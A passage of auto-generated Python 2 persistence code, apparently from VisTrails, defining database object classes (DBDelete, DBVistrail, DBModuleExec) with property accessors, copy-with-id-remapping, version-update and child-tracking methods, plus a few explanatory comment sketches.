self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_prevId(self):
return self._db_prevId
def __set_db_prevId(self, prevId):
self._db_prevId = prevId
self.is_dirty = True
db_prevId = property(__get_db_prevId, __set_db_prevId)
def db_add_prevId(self, prevId):
self._db_prevId = prevId
def db_change_prevId(self, prevId):
self._db_prevId = prevId
def db_delete_prevId(self, prevId):
self._db_prevId = None
def __get_db_date(self):
return self._db_date
def __set_db_date(self, date):
self._db_date = date
self.is_dirty = True
db_date = property(__get_db_date, __set_db_date)
def db_add_date(self, date):
self._db_date = date
def db_change_date(self, date):
self._db_date = date
def db_delete_date(self, date):
self._db_date = None
def __get_db_session(self):
return self._db_session
def __set_db_session(self, session):
self._db_session = session
self.is_dirty = True
db_session = property(__get_db_session, __set_db_session)
def db_add_session(self, session):
self._db_session = session
def db_change_session(self, session):
self._db_session = session
def db_delete_session(self, session):
self._db_session = None
def __get_db_user(self):
return self._db_user
def __set_db_user(self, user):
self._db_user = user
self.is_dirty = True
db_user = property(__get_db_user, __set_db_user)
def db_add_user(self, user):
self._db_user = user
def db_change_user(self, user):
self._db_user = user
def db_delete_user(self, user):
self._db_user = None
def __get_db_prune(self):
return self._db_prune
def __set_db_prune(self, prune):
self._db_prune = prune
self.is_dirty = True
db_prune = property(__get_db_prune, __set_db_prune)
def db_add_prune(self, prune):
self._db_prune = prune
def db_change_prune(self, prune):
self._db_prune = prune
def db_delete_prune(self, prune):
self._db_prune = None
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
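# Copy sketch for action chains (illustrative; `scope` is assumed to be
# the id-scope helper used with do_copy throughout this module, providing
# getNewId() and a remap dict):
#
#     id_remap = {}
#     c1 = a1.do_copy(new_ids=True, id_scope=scope, id_remap=id_remap)
#     c2 = a2.do_copy(new_ids=True, id_scope=scope, id_remap=id_remap)
#     # if a2.db_prevId == a1.db_id, then c2.db_prevId == c1.db_id,
#     # because a1's copy recorded ('action', a1.db_id) in id_remap
#
# Copy parents before children (in prevId order), or the prevId links of
# later copies will not be remapped.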
class DBDelete(object):
vtType = 'delete'
def __init__(self, id=None, what=None, objectId=None, parentObjId=None, parentObjType=None):
self._db_id = id
self._db_what = what
self._db_objectId = objectId
self._db_parentObjId = parentObjId
self._db_parentObjType = parentObjType
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBDelete.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBDelete(id=self._db_id,
what=self._db_what,
objectId=self._db_objectId,
parentObjId=self._db_parentObjId,
parentObjType=self._db_parentObjType)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_objectId') and (self._db_what, self._db_objectId) in id_remap:
cp._db_objectId = id_remap[(self._db_what, self._db_objectId)]
if hasattr(self, 'db_parentObjId') and (self._db_parentObjType, self._db_parentObjId) in id_remap:
cp._db_parentObjId = id_remap[(self._db_parentObjType, self._db_parentObjId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBDelete()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'what' in class_dict:
res = class_dict['what'](old_obj, trans_dict)
new_obj.db_what = res
elif hasattr(old_obj, 'db_what') and old_obj.db_what is not None:
new_obj.db_what = old_obj.db_what
if 'objectId' in class_dict:
res = class_dict['objectId'](old_obj, trans_dict)
new_obj.db_objectId = res
elif hasattr(old_obj, 'db_objectId') and old_obj.db_objectId is not None:
new_obj.db_objectId = old_obj.db_objectId
if 'parentObjId' in class_dict:
res = class_dict['parentObjId'](old_obj, trans_dict)
new_obj.db_parentObjId = res
elif hasattr(old_obj, 'db_parentObjId') and old_obj.db_parentObjId is not None:
new_obj.db_parentObjId = old_obj.db_parentObjId
if 'parentObjType' in class_dict:
res = class_dict['parentObjType'](old_obj, trans_dict)
new_obj.db_parentObjType = res
elif hasattr(old_obj, 'db_parentObjType') and old_obj.db_parentObjType is not None:
new_obj.db_parentObjType = old_obj.db_parentObjType
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
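    # Sketch of how trans_dict drives update_version (editorial addition; the
    # lambda is a hypothetical translator, not VisTrails code). The mapping is
    # class name -> field name -> callable(old_obj, trans_dict); fields with
    # no entry are copied verbatim when present and non-None.
    #
    #   trans_dict = {'DBDelete': {'what': lambda old, td: old.db_what.lower()}}
    #   new = DBDelete.update_version(old_delete, trans_dict)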
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_what(self):
return self._db_what
def __set_db_what(self, what):
self._db_what = what
self.is_dirty = True
db_what = property(__get_db_what, __set_db_what)
def db_add_what(self, what):
self._db_what = what
def db_change_what(self, what):
self._db_what = what
def db_delete_what(self, what):
self._db_what = None
def __get_db_objectId(self):
return self._db_objectId
def __set_db_objectId(self, objectId):
self._db_objectId = objectId
self.is_dirty = True
db_objectId = property(__get_db_objectId, __set_db_objectId)
def db_add_objectId(self, objectId):
self._db_objectId = objectId
def db_change_objectId(self, objectId):
self._db_objectId = objectId
def db_delete_objectId(self, objectId):
self._db_objectId = None
def __get_db_parentObjId(self):
return self._db_parentObjId
def __set_db_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
self.is_dirty = True
db_parentObjId = property(__get_db_parentObjId, __set_db_parentObjId)
def db_add_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_change_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_delete_parentObjId(self, parentObjId):
self._db_parentObjId = None
def __get_db_parentObjType(self):
return self._db_parentObjType
def __set_db_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
self.is_dirty = True
db_parentObjType = property(__get_db_parentObjType, __set_db_parentObjType)
def db_add_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_change_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_delete_parentObjType(self, parentObjType):
self._db_parentObjType = None
def getPrimaryKey(self):
return self._db_id
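# Copy semantics sketch (editorial addition): with new_ids=True, do_copy draws
# a fresh id from id_scope and records the translation in id_remap so that id
# references held elsewhere (e.g. a delete's objectId) can be rewritten later.
# id_scope is assumed to come from the surrounding package; it is not defined
# in this excerpt.
#
#   id_remap = {}
#   cp = some_delete.do_copy(new_ids=True, id_scope=id_scope, id_remap=id_remap)
#   # cp.db_id is newly allocated; id_remap maps (vtType, old_id) -> new_id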
class DBVistrail(object):
vtType = 'vistrail'
def __init__(self, id=None, entity_type=None, version=None, name=None, last_modified=None, actions=None, tags=None, annotations=None):
self._db_id = id
self._db_entity_type = entity_type
self._db_version = version
self._db_name = name
self._db_last_modified = last_modified
self.db_deleted_actions = []
self.db_actions_id_index = {}
if actions is None:
self._db_actions = []
else:
self._db_actions = actions
for v in self._db_actions:
self.db_actions_id_index[v.db_id] = v
self.db_deleted_tags = []
self.db_tags_id_index = {}
self.db_tags_name_index = {}
if tags is None:
self._db_tags = []
else:
self._db_tags = tags
for v in self._db_tags:
self.db_tags_id_index[v.db_id] = v
self.db_tags_name_index[v.db_name] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBVistrail.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBVistrail(id=self._db_id,
entity_type=self._db_entity_type,
version=self._db_version,
name=self._db_name,
last_modified=self._db_last_modified)
if self._db_actions is None:
cp._db_actions = []
else:
cp._db_actions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_actions]
if self._db_tags is None:
cp._db_tags = []
else:
cp._db_tags = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_tags]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_actions_id_index = dict((v.db_id, v) for v in cp._db_actions)
cp.db_tags_id_index = dict((v.db_id, v) for v in cp._db_tags)
cp.db_tags_name_index = dict((v.db_name, v) for v in cp._db_tags)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBVistrail()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'actions' in class_dict:
res = class_dict['actions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_action(obj)
elif hasattr(old_obj, 'db_actions') and old_obj.db_actions is not None:
for obj in old_obj.db_actions:
new_obj.db_add_action(DBAction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_actions') and hasattr(new_obj, 'db_deleted_actions'):
for obj in old_obj.db_deleted_actions:
n_obj = DBAction.update_version(obj, trans_dict)
new_obj.db_deleted_actions.append(n_obj)
if 'tags' in class_dict:
res = class_dict['tags'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_tag(obj)
elif hasattr(old_obj, 'db_tags') and old_obj.db_tags is not None:
for obj in old_obj.db_tags:
new_obj.db_add_tag(DBTag.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_tags') and hasattr(new_obj, 'db_deleted_tags'):
for obj in old_obj.db_deleted_tags:
n_obj = DBTag.update_version(obj, trans_dict)
new_obj.db_deleted_tags.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_actions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_action(child)
to_del = []
for child in self.db_tags:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_tag(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_actions)
children.extend(self.db_deleted_tags)
children.extend(self.db_deleted_annotations)
if remove:
self.db_deleted_actions = []
self.db_deleted_tags = []
self.db_deleted_annotations = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_actions:
if child.has_changes():
return True
for child in self._db_tags:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_actions(self):
return self._db_actions
def __set_db_actions(self, actions):
self._db_actions = actions
self.is_dirty = True
db_actions = property(__get_db_actions, __set_db_actions)
def db_get_actions(self):
return self._db_actions
def db_add_action(self, action):
self.is_dirty = True
self._db_actions.append(action)
self.db_actions_id_index[action.db_id] = action
def db_change_action(self, action):
self.is_dirty = True
found = False
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == action.db_id:
self._db_actions[i] = action
found = True
break
if not found:
self._db_actions.append(action)
self.db_actions_id_index[action.db_id] = action
def db_delete_action(self, action):
self.is_dirty = True
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == action.db_id:
if not self._db_actions[i].is_new:
self.db_deleted_actions.append(self._db_actions[i])
del self._db_actions[i]
break
del self.db_actions_id_index[action.db_id]
def db_get_action(self, key):
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == key:
return self._db_actions[i]
return None
def db_get_action_by_id(self, key):
return self.db_actions_id_index[key]
def db_has_action_with_id(self, key):
return key in self.db_actions_id_index
def __get_db_tags(self):
return self._db_tags
def __set_db_tags(self, tags):
self._db_tags = tags
self.is_dirty = True
db_tags = property(__get_db_tags, __set_db_tags)
def db_get_tags(self):
return self._db_tags
def db_add_tag(self, tag):
self.is_dirty = True
self._db_tags.append(tag)
self.db_tags_id_index[tag.db_id] = tag
self.db_tags_name_index[tag.db_name] = tag
def db_change_tag(self, tag):
self.is_dirty = True
found = False
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == tag.db_id:
self._db_tags[i] = tag
found = True
break
if not found:
self._db_tags.append(tag)
self.db_tags_id_index[tag.db_id] = tag
self.db_tags_name_index[tag.db_name] = tag
def db_delete_tag(self, tag):
self.is_dirty = True
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == tag.db_id:
if not self._db_tags[i].is_new:
self.db_deleted_tags.append(self._db_tags[i])
del self._db_tags[i]
break
del self.db_tags_id_index[tag.db_id]
del self.db_tags_name_index[tag.db_name]
def db_get_tag(self, key):
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == key:
return self._db_tags[i]
return None
def db_get_tag_by_id(self, key):
return self.db_tags_id_index[key]
def db_has_tag_with_id(self, key):
return key in self.db_tags_id_index
def db_get_tag_by_name(self, key):
return self.db_tags_name_index[key]
def db_has_tag_with_name(self, key):
return key in self.db_tags_name_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
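# Index lookup sketch (editorial addition; the DBTag constructor arguments are
# illustrative assumptions): DBVistrail keeps tags indexed both by id and by
# name, so lookups avoid a linear scan over the tag list.
#
#   vt = DBVistrail(id=1, name='example')
#   vt.db_add_tag(DBTag(id=10, name='baseline'))
#   if vt.db_has_tag_with_name('baseline'):
#       tag = vt.db_get_tag_by_name('baseline')   # O(1) via db_tags_name_index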
class DBModuleExec(object):
vtType = 'module_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, cached=None, module_id=None, module_name=None, completed=None, error=None, abstraction_id=None, abstraction_version=None, machine_id=None, annotations=None, loop_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_cached = cached
self._db_module_id = module_id
self._db_module_name = module_name
self._db_completed = completed
self._db_error = error
self._db_abstraction_id = abstraction_id
self._db_abstraction_version = abstraction_version
self._db_machine_id = machine_id
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_deleted_loop_execs = []
self.db_loop_execs_id_index = {}
if loop_execs is None:
self._db_loop_execs = []
else:
self._db_loop_execs = loop_execs
for v in self._db_loop_execs:
self.db_loop_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBModuleExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModuleExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
cached=self._db_cached,
module_id=self._db_module_id,
module_name=self._db_module_name,
completed=self._db_completed,
error=self._db_error,
abstraction_id=self._db_abstraction_id,
abstraction_version=self._db_abstraction_version,
machine_id=self._db_machine_id)
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_loop_execs is None:
cp._db_loop_execs = []
else:
cp._db_loop_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_loop_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_module_id') and ('module', self._db_module_id) in id_remap:
cp._db_module_id = id_remap[('module', self._db_module_id)]
if hasattr(self, 'db_machine_id') and ('machine', self._db_machine_id) in id_remap:
cp._db_machine_id = id_remap[('machine', self._db_machine_id)]
# recreate indices and set flags
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_loop_execs_id_index = dict((v.db_id, v) for v in cp._db_loop_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBModuleExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'cached' in class_dict:
res = class_dict['cached'](old_obj, trans_dict)
new_obj.db_cached = res
elif hasattr(old_obj, 'db_cached') and old_obj.db_cached is not None:
new_obj.db_cached = old_obj.db_cached
if 'module_id' in class_dict:
res = class_dict['module_id'](old_obj, trans_dict)
new_obj.db_module_id = res
elif hasattr(old_obj, 'db_module_id') and old_obj.db_module_id is not None:
new_obj.db_module_id = old_obj.db_module_id
if 'module_name' in class_dict:
res = class_dict['module_name'](old_obj, trans_dict)
new_obj.db_module_name = res
elif hasattr(old_obj, 'db_module_name') and old_obj.db_module_name is not None:
new_obj.db_module_name = old_obj.db_module_name
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'abstraction_id' in class_dict:
res = class_dict['abstraction_id'](old_obj, trans_dict)
new_obj.db_abstraction_id = res
elif hasattr(old_obj, 'db_abstraction_id') and old_obj.db_abstraction_id is not None:
new_obj.db_abstraction_id = old_obj.db_abstraction_id
if 'abstraction_version' in class_dict:
res = class_dict['abstraction_version'](old_obj, trans_dict)
new_obj.db_abstraction_version = res
elif hasattr(old_obj, 'db_abstraction_version') and old_obj.db_abstraction_version is not None:
new_obj.db_abstraction_version = old_obj.db_abstraction_version
if 'machine_id' in class_dict:
res = class_dict['machine_id'](old_obj, trans_dict)
new_obj.db_machine_id = res
elif hasattr(old_obj, 'db_machine_id') and old_obj.db_machine_id is not None:
new_obj.db_machine_id = old_obj.db_machine_id
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'loop_execs' in class_dict:
res = class_dict['loop_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_loop_exec(obj)
elif hasattr(old_obj, 'db_loop_execs') and old_obj.db_loop_execs is not None:
for obj in old_obj.db_loop_execs:
new_obj.db_add_loop_exec(DBLoopExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_loop_execs') and hasattr(new_obj, 'db_deleted_loop_execs'):
for obj in old_obj.db_deleted_loop_execs:
n_obj = DBLoopExec.update_version(obj, trans_dict)
new_obj.db_deleted_loop_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_loop_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_loop_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_loop_execs)
if remove:
self.db_deleted_annotations = []
self.db_deleted_loop_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_loop_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_cached(self):
return self._db_cached
def __set_db_cached(self, cached):
self._db_cached = cached
self.is_dirty = True
db_cached = property(__get_db_cached, __set_db_cached)
def db_add_cached(self, cached):
self._db_cached = cached
def db_change_cached(self, cached):
self._db_cached = cached
def db_delete_cached(self, cached):
self._db_cached = None
def __get_db_module_id(self):
return self._db_module_id
def __set_db_module_id(self, module_id):
self._db_module_id = module_id
self.is_dirty = True
db_module_id = property(__get_db_module_id, __set_db_module_id)
def db_add_module_id(self, module_id):
self._db_module_id = module_id
def db_change_module_id(self, module_id):
self._db_module_id = module_id
def db_delete_module_id(self, module_id):
self._db_module_id = None
def __get_db_module_name(self):
return self._db_module_name
def __set_db_module_name(self, module_name):
self._db_module_name = module_name
self.is_dirty = True
db_module_name = property(__get_db_module_name, __set_db_module_name)
def db_add_module_name(self, module_name):
self._db_module_name = module_name
def db_change_module_name(self, module_name):
